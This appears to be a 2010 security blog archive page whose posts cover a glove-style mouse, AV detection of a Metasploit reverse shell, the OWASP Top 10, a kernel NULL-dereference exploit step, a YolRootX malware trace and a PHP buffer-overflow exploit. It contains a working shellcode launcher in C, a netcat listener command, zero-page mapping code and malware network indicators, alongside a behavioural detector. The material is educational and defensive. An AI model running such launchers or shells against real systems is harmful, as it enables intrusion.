Friday, April 30, 2010

MouseGlove: New Video

Hi folks,
today I wanna show you this nice video of the next generation of mouse: MouseGlove


MouseGlove from Marco Ramilli on Vimeo.


Over the past few days I have received a lot of emails about this project. I promise I will answer all of you; I only need time :D. Thank you very much for your wonderful words and support. I hope you will improve the current version. If you do, please send me emails with pictures and, if you wish, a video like this one. Thanks.
Stay tuned, big news on security is coming up.

Sunday, April 25, 2010

Introducing ... MouseGlove V0.1 !

Hi Folks,
during the past week I've been working hard on several projects. One of them is called MouseGlove, and version 0.1 is now available on SourceForge (http://mouseglove.sourceforge.net). If you are a developer, grab my source and improve it!
Let's take a look at MouseGlove V0.1






MouseGlove is an open source project for a new generation of mouse. The goal of this project is to provide open source hardware and software that encourage new developers to improve the usability of computers through new interfaces. MouseGlove is a new kind of interface, created to help people with disabilities who cannot use common interfaces such as the mouse and keyboard. MouseGlove offers a natural way to move the screen pointer and to click and drag objects. Each action is as natural as using your hands to hold, move and touch real objects on a desk. I encourage every developer to grab my source code and electronics and build an improved version of MouseGlove, keeping alive the next generation of computer mouse interfaces.

Monday, April 19, 2010

Windows ShellCode Detection

Hi Folks, today I want to walk you through a nice malware analysis experience I had this morning. Basically, for a penetration testing engagement, I had to evaluate some shellcodes and come up with judgments on their efficiency and validity.
For this reason I performed tons of shellcode testing. What is interesting is that when analyzing the shellcodes, both statically and dynamically, I found out that only a few AVs detect them. Come on guys, we are talking about shellcodes, not new virus paradigms... they should be very easy to detect since they spawn a shell, right? (see the dynamic analysis below)

So let's try it. First of all you need to build your own payload. I built a generic Windows reverse shell; the generate command in Metasploit 3 is really useful in such a case. The following image shows how to generate a simple payload using Metasploit 3.




Once you have the desired payload, you have to write a small program to run it. The following image shows my simple payload-running code.
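
The launcher itself, as an added example (my code, not the program in the post's image): it copies the C byte array that Metasploit's generate command emits into executable memory and calls it as a function. The payload bytes below are a constructed stand-in, `mov eax, 42 ; ret`, so the program can be run safely on any x86 machine; replace `ret42_stub` with the real shellcode array. Under MinGW the code uses VirtualAlloc, elsewhere mmap.

```c
/* Minimal shellcode launcher (added example, not the post's own code).
 * Paste the C array produced by Metasploit's generate command in place
 * of ret42_stub to get the launcher the post describes. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Constructed stand-in for a real payload: `mov eax, 42 ; ret`. The encoding
 * is identical on i386 and x86-64, so the launcher can be exercised safely. */
const unsigned char ret42_stub[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };
const size_t ret42_stub_len = sizeof ret42_stub;

/* 1 when this build runs on an x86-family CPU, where the stub is valid code. */
int stub_supported(void) {
#if defined(__i386__) || defined(__x86_64__) || defined(_M_IX86) || defined(_M_X64)
    return 1;
#else
    return 0;
#endif
}

/* Allocate n bytes of RWX memory: VirtualAlloc on Windows, mmap elsewhere. */
static unsigned char *alloc_exec(size_t n) {
#ifdef _WIN32
    return (unsigned char *)VirtualAlloc(NULL, n, MEM_COMMIT | MEM_RESERVE,
                                         PAGE_EXECUTE_READWRITE);
#else
    void *p = mmap(NULL, n, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : (unsigned char *)p;
#endif
}

static void free_exec(unsigned char *p, size_t n) {
#ifdef _WIN32
    (void)n;
    VirtualFree(p, 0, MEM_RELEASE);
#else
    munmap(p, n);
#endif
}

/* Copy the payload into executable memory and call it as a function.
 * Returns whatever the payload leaves in eax, or -1 if allocation failed.
 * A real reverse shell never returns here: the listening nc gets the shell. */
int run_shellcode(const unsigned char *sc, size_t n) {
    unsigned char *mem = alloc_exec(n);
    if (mem == NULL)
        return -1;
    memcpy(mem, sc, n);

    int (*entry)(void);
    memcpy(&entry, &mem, sizeof entry);   /* object-to-function pointer, warning-free */
    int rc = entry();

    free_exec(mem, n);
    return rc;
}

int main(void) {
    if (!stub_supported()) {
        puts("stub is x86-only; skipping execution");
        return 0;
    }
    printf("payload returned %d\n", run_shellcode(ret42_stub, ret42_stub_len));
    return 0;
}
```

Note that this launcher is exactly the pattern a behavioural AV engine looks for: an RWX allocation followed by a jump into it. The payload bytes may change from build to build, but the launcher's behaviour does not.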

Alright, what we need now is to compile our shellcode launcher. Since I am a Mac user, I use MinGW to cross-compile for Windows.

Here we go! We got a wonderful a.exe Windows executable. Of course it works: just start
nc -l 4444
on your local machine, run a.exe on the Windows machine, and everything works fine!
BUT that's not the point. The real point comes now: analyzing a.exe with a service like VirusTotal, you discover that only a few AVs detect the shellcode as malware.



As you can see, a few AVs such as Avast, GData and Microsoft detect the crafted shellcode, but they are only a handful out of all of them, and they are not the most widely used commercial AVs either. That seems very weird. So let's see whether it's really so difficult to detect shellcodes.
Summary of the dynamic analysis:

Interesting Libraries:
LoadLibrary(ws2_32)
LoadLibrary(mswsock.dll)
LoadLibrary(hnetcfg.dll)
LoadLibrary(rpcrt4.dll)
LoadLibrary(wshtcpip.dll)
CreateProcess((null),cmd,(null))
GetModuleHandle(winlogon.EXE)
LoadLibrary(version.dll)
LoadLibrary(cmd.exe)
GetModuleHandle(advapi32)
LoadLibrary(advapi32.dll)
LoadLibrary(ntdll.dll)

Execution:
Executing: c:\windows\system32\cmd.exe
CreateProcess(C:\WINDOWS\system32\netstat.exe,netstat,C:\Documents and Settings\Administrator\Desktop)
LoadLibrary(netstat.exe)
Executing: c:\windows\system32\netstat.exe
OpenService(RemoteAccess)
OpenService(Router)

[...]


Well... an application which loads a sockets library, cmd and ntdll, and which executes cmd and then netstat: doesn't it look like a shellcode? Is it so difficult to detect? The fact that some AVs detect the shellcode means it is possible, and the dynamic sandbox analysis confirms that the behaviour is plainly visible. So why don't the major AV companies recognize it? Maybe none of them is doing dynamic analysis? ;] We'll figure it out soon...
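
To show that the trace above already carries the signal, here is an added example (my code, not from the post or from any sandbox product) that scores API-trace lines of the same form against a few behavioural rules: a sockets library load together with a cmd.exe spawn is a reverse or bind shell, a spawned netstat is post-exploitation recon, and an "Injected code into process:" line (the form used in the YolRootX trace further down this page) is process injection. The rules and their names are mine; the embedded trace lines are constructed from the ones listed above, plus a constructed benign trace for contrast.

```c
/* Behavioural triage of sandbox API-trace lines (added example). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum {
    BEH_NETWORK = 1 << 0, /* sockets library loaded (ws2_32, wsock32, mswsock) */
    BEH_SHELL   = 1 << 1, /* cmd.exe spawned */
    BEH_RECON   = 1 << 2, /* host-enumeration tool spawned (netstat, ipconfig, ...) */
    BEH_INJECT  = 1 << 3  /* code written into another process */
};

/* Case-insensitive substring test: 1 if needle occurs in hay. */
static int contains(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return 1;
    }
    return 0;
}

/* Case-insensitive prefix test. */
static int starts_with(const char *s, const char *prefix) {
    while (*prefix)
        if (tolower((unsigned char)*s++) != tolower((unsigned char)*prefix++))
            return 0;
    return 1;
}

/* Flags raised by a single trace line. */
unsigned classify_line(const char *line) {
    unsigned f = 0;
    if (starts_with(line, "LoadLibrary(") &&
        (contains(line, "ws2_32") || contains(line, "wsock32") || contains(line, "mswsock")))
        f |= BEH_NETWORK;
    if (starts_with(line, "CreateProcess(") || starts_with(line, "Executing:")) {
        if (contains(line, "cmd"))
            f |= BEH_SHELL;
        if (contains(line, "netstat") || contains(line, "ipconfig") ||
            contains(line, "whoami") || contains(line, "tasklist"))
            f |= BEH_RECON;
    }
    if (starts_with(line, "Injected code into process:"))
        f |= BEH_INJECT;
    return f;
}

/* OR of the flags over a whole trace. */
unsigned classify_trace(const char *const *lines, size_t n) {
    unsigned f = 0;
    for (size_t i = 0; i < n; i++)
        f |= classify_line(lines[i]);
    return f;
}

/* Verdict: it is the combination that matters, a sockets library alone is
 * loaded by every networked program and only earns a manual look. */
const char *verdict(unsigned f) {
    if ((f & BEH_NETWORK) && (f & BEH_SHELL))
        return "reverse/bind shell";
    if (f & BEH_INJECT)
        return "process injection";
    if (f)
        return "weak signal";
    return "clean";
}

/* Constructed sample: the trace lines reported above. */
const char *const reverse_shell_trace[] = {
    "LoadLibrary(ws2_32)",
    "LoadLibrary(mswsock.dll)",
    "CreateProcess((null),cmd,(null))",
    "LoadLibrary(cmd.exe)",
    "Executing: c:\\windows\\system32\\cmd.exe",
    "CreateProcess(C:\\WINDOWS\\system32\\netstat.exe,netstat,C:\\Documents and Settings\\Administrator\\Desktop)",
};
const size_t reverse_shell_trace_len = sizeof reverse_shell_trace / sizeof reverse_shell_trace[0];

/* Constructed benign trace: a console tool that uses sockets but spawns nothing. */
const char *const benign_trace[] = {
    "LoadLibrary(ws2_32)",
    "LoadLibrary(advapi32.dll)",
    "GetModuleHandle(kernel32)",
};
const size_t benign_trace_len = sizeof benign_trace / sizeof benign_trace[0];

int main(void) {
    unsigned f = classify_trace(reverse_shell_trace, reverse_shell_trace_len);
    printf("a.exe trace: flags=0x%x verdict=%s\n", f, verdict(f));
    f = classify_trace(benign_trace, benign_trace_len);
    printf("benign trace: flags=0x%x verdict=%s\n", f, verdict(f));
    return 0;
}
```

Four rules on a handful of lines are enough to separate the a.exe trace from a benign network tool, which is the point: the payload bytes change with every encoder run, the behaviour does not.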

OWASP Top 10 out ! (2010)

Hi Folks, this morning I recommend this reading (OWASP Top 10 for 2010) as one of the fundamental readings for every pen-tester.


Summing up the reading:

The OWASP Top 10 Web Application Security Risks for 2010 are:

  • A1: Injection
  • A2: Cross-Site Scripting (XSS)
  • A3: Broken Authentication and Session Management
  • A4: Insecure Direct Object References
  • A5: Cross-Site Request Forgery (CSRF)
  • A6: Security Misconfiguration
  • A7: Insecure Cryptographic Storage
  • A8: Failure to Restrict URL Access
  • A9: Insufficient Transport Layer Protection
  • A10: Unvalidated Redirects and Forwards

Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!!

As you help us spread the word, please emphasize:

  • OWASP is reaching out to developers, not just the application security community
  • The Top 10 is about managing risk, not just avoiding vulnerabilities
  • To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation

We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.

Friday, April 16, 2010

Finally Speed Matters

Hi Folks,
finally Google discovered speed! :D Just kidding... I am so happy that Google announced (see below) that web site speed will be a new search ranking factor. In short: the faster your web site, the higher its Google rank.



At Google, we've gathered hard data to reinforce our intuition that "speed matters" on the Internet. Google runs experiments on the search results page to understand and improve the search experience. Recently, we conducted some experiments to determine how users react when web search takes longer. We've always viewed speed as a competitive advantage, so this research is important to understand the trade-off between speed and other features we might introduce. We wanted to share this information with the public because we hope it will give others greater insight into how important speed can be.

Speed as perceived by the end user is driven by multiple factors, including how fast results are returned and how long it takes a browser to display the content. Our experiments injected server-side delay to model one of these factors: extending the processing time before and during the time that the results are transmitted to the browser. In other words, we purposefully slowed the delivery of search results to our users to see how they might respond.

All other things being equal, more usage, as measured by number of searches, reflects more satisfied users. Our experiments demonstrate that slowing down the search results page by 100 to 400 milliseconds has a measurable impact on the number of searches per user of -0.2% to -0.6% (averaged over four or six weeks depending on the experiment). That's 0.2% to 0.6% fewer searches for changes under half a second!

Furthermore, users do fewer and fewer searches the longer they are exposed to the experiment. Users exposed to a 200 ms delay since the beginning of the experiment did 0.22% fewer searches during the first three weeks, but 0.36% fewer searches during the second three weeks. Similarly, users exposed to a 400 ms delay since the beginning of the experiment did 0.44% fewer searches during the first three weeks, but 0.76% fewer searches during the second three weeks. Even if the page returns to the faster state, users who saw the longer delay take time to return to their previous usage level. Users exposed to the 400 ms delay for six weeks did 0.21% fewer searches on average during the five week period after we stopped injecting the delay.

While these numbers may seem small, a daily impact of 0.5% is of real consequence at the scale of Google web search, or indeed at the scale of most Internet sites. Because the cost of slower performance increases over time and persists, we encourage site designers to think twice about adding a feature that hurts performance if the benefit of the feature is unproven.


For more information check out here !

Thursday, April 15, 2010

Exploiting a kernel NULL dereference

Hi Folks,
I am sorry for the long silence, but this month I am very busy :(
Today I just wanna suggest this reading on Kernel Exploitation


We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:



Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We’ve passed the first step to a working exploit.
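
The first step the excerpt describes, as an added example (my code, not the article's program, and without the article's nullderef module, so nothing in the kernel is dereferenced here): map the page at address 0 from user space with mmap(MAP_FIXED), so that a later kernel NULL dereference would read attacker-controlled memory instead of faulting. On a current Linux kernel the vm.mmap_min_addr sysctl refuses that mapping to any process without CAP_SYS_RAWIO and mmap fails with EPERM, which is the mitigation that kills this class of exploit at step one; the program reports which outcome it got.

```c
/* Mapping the zero page from user space (added example, Linux). */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Try to map one anonymous RW page at address 0.
 * Returns 1 if the page was mapped and is writable (*err = 0), 0 otherwise
 * with *err set to errno. EPERM means vm.mmap_min_addr refused the mapping
 * because the process lacks CAP_SYS_RAWIO. */
int map_null_page(int *err) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    void *p = mmap((void *)0, page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED) {
        *err = errno;
        return 0;
    }
    /* p is the null pointer now; volatile keeps the compiler from treating
     * the access as undefined and optimising it away. */
    volatile unsigned char *zero = (volatile unsigned char *)p;
    zero[0] = 0xCC;                 /* whatever the kernel would read or jump to */
    int ok = (zero[0] == 0xCC);
    munmap(p, page);
    *err = 0;
    return ok;
}

int main(void) {
    int err;
    if (map_null_page(&err))
        puts("zero page mapped: a kernel NULL dereference would now hit user memory");
    else
        printf("mmap(0, MAP_FIXED) refused: %s%s\n", strerror(err),
               err == EPERM ? " (vm.mmap_min_addr)" : "");
    return 0;
}
```

Run it as an unprivileged user on a default distribution kernel and you get the EPERM branch; run it with `vm.mmap_min_addr` set to 0, or with CAP_SYS_RAWIO, and the mapping succeeds, which is the precondition the rest of the article builds on.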

Friday, April 9, 2010

WebKit2: a good chance for security !

Hey Folks,
finally Safari decided to upgrade its WebKit, adding sandboxes and process separation. Here is the official high-level documentation




Take a look, it seems very promising!

Thursday, April 8, 2010

iGov 2010. I'll be there!

A totally new experience for me. If you are one of the few selected researchers, please contact me; we might go there together.



Today, digital government (DG) research is being conducted all over the world. Most of this work is focused within the geographic and political contexts of individual countries. However, given the growing influence of global economic, social, technical, and political forces, the questions embedded in digital government research are now expanding to international dimensions that focus on topics that cross the jurisdictions, cultures, or customs of different countries.
The iGov Research Institute, a week-long residential program, provides doctoral students from around the world an opportunity to assess the impact of information and communication technologies in the public sector and to understand the value of doing research in an international context. Developed by the Center for Technology in Government, under the sponsorship of the U.S. National Science Foundation, the Institute takes advantage of the experiences of a major city or region as an integral part of the program. It includes field visits and discussions with innovative government leaders, as well as academic sessions.

Tuesday, April 6, 2010

Malware YolRootX

Hi Folks,
having no time for good posts, I just paste here some analysis results for YolRootX, a new malware that I analyzed yesterday.




File System Changes:

(Adding new key material under the user's RSA key store!)
- C:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1078081533-1677128483-1801674531-500\699c4b9cdebca7aaea5193cae8a50098_5fc4e98d-1101-4864-b0bf-e0b3f6d9d878

(Some cookies ... just in case ;) )
- C:\Documents and Settings\Administrator\Cookies\administrator@globo[1].txt
- C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt
- C:\Documents and Settings\Administrator\Cookies\administrator@www.globo[1].txt

(hidden content in \Temp)
C:\Documents and Settings\Administrator\Local Settings\Temp\~DFC517.tmp

(Internet Explorer settings ... )
..\software\microsoft\internet explorer\main

(Ahh Ahmm ! autostart key under reg\user !)
user\current\software\Microsoft\Internet Explorer\Toolbar\Locked = 01000000

(Did I ask for these queries? ;) )

Query DNS: www.oviedolocal3476.com
Query DNS: www.globo.com
Query DNS: ads.globo.com
Query DNS: ads.img.globo.com
Query DNS: fpdownloadocument.macromedia.com
Query DNS: fpdownloadocument.macromedia.com.gateway.2wire.net
Query DNS: activex.microsoft.com
Query DNS: codecs.microsoft.com
Query DNS: video.globo.com
Query DNS: www.google-analytics.com
Query DNS: imagem2.buscape.com.br
Query DNS: www.google.com
Query DNS: clients1.google.com
Query DNS: id.google.com

(I don't speak Spanish at all...)
Internet connection: Connects to "65.55.13.243" on port 80 (TCP - HTTP).
Internet connection: Connects to "201.7.178.53" on port 80 (TCP - HTTP).
Internet connection: Connects to "74.125.19.113" on port 80 (TCP - HTTP).

(Processes, a new service and binary injection??)
Created process: (null),explorer.exe http://www.globo.com,(null)
Opened a service named: ShellHWDetection
Injected code into process: explorer.exe
Injected code into process: iexplore.exe

(loading interesting Windows APIs)

LoadLibrary(netapi32.dll)
LoadLibrary(kernel32.dll)
LoadLibrary(version.dll)
LoadLibrary(explorer.exe)
LoadLibrary(comctl32.dll)
LoadLibrary(shell32.dll)
LoadLibrary(windowsshell.manifest)
LoadLibrary(browselc.dll)
LoadLibrary(wsock32)
LoadLibrary(mswsock.dll)
LoadLibrary(hnetcfg.dll)
LoadLibrary(wshtcpip.dll)
LoadLibrary(actxprxy.dll)
LoadLibrary(msmsgs.exe)
LoadLibrary(jscript.dll)


Monday, April 5, 2010

PHP 6.0 Dev str_transliterate(). A great Example !

Hi Folks,
today I want to point out this nice exploit for the PHP 6.0 Dev str_transliterate() buffer overflow, implemented by Pr0T3cT10n. Why do I say it's a nice exploit? Well, in my opinion this is a great, easy example of a buffer overflow: ideal for learning, and a striking demonstration that even new applications contain old bugs due to poor secure-development practice.
Right now I'm thinking of the CeSeNA folks (cesena.ing2.unibo.it); many of them are burning to know how to inject shellcode through a buffer overflow. For all of you interested in the "art of exploitation", I totally suggest starting from this self-commenting example. (Click to Enlarge)



There are no comments about the shellcode since I have discussed shellcodes a lot in the past. I will probably use this exploit during my future talks on buffer overflows. Hope you enjoy this didactic exploit.



Original code. (Download here)
Original Vulnerable app (Download here)


*Update:*
Yes, of course: \u4141 is two 'A's and \u9090 is two NOPs, because each \uXXXX escape is one 16-bit code unit, i.e. two bytes once the string is encoded (U+4141 is the byte pair 41 41). So 20 x (2-byte NOP) = 40 bytes and 256 x (2-byte 'A') = 512 bytes. Thanks to TheLeader for pointing it out.

iPad Jailbreaking !

Only a video. Nothing more than that is needed to explain the "situation" here.

Saturday, April 3, 2010

.htaccess automation

Hi Folks,
today I needed to write up a .htaccess file for a web site of mine. It has been a while since I last wrote one, and as always happens I forgot its syntax... well, I forgot almost everything about it. I thought: no way, I don't want to study the syntax again; there must be an automatic online tool to generate it. Of course there is! :D And here it is!


.htaccess is a very useful web server feature. Unfortunately people like me who don't use it very often, not being web designers, tend to forget how to write it. Using this free online tool we can speed up our "web developer's hour". Enjoy your future .htaccess creation! Now you can forget about it ;)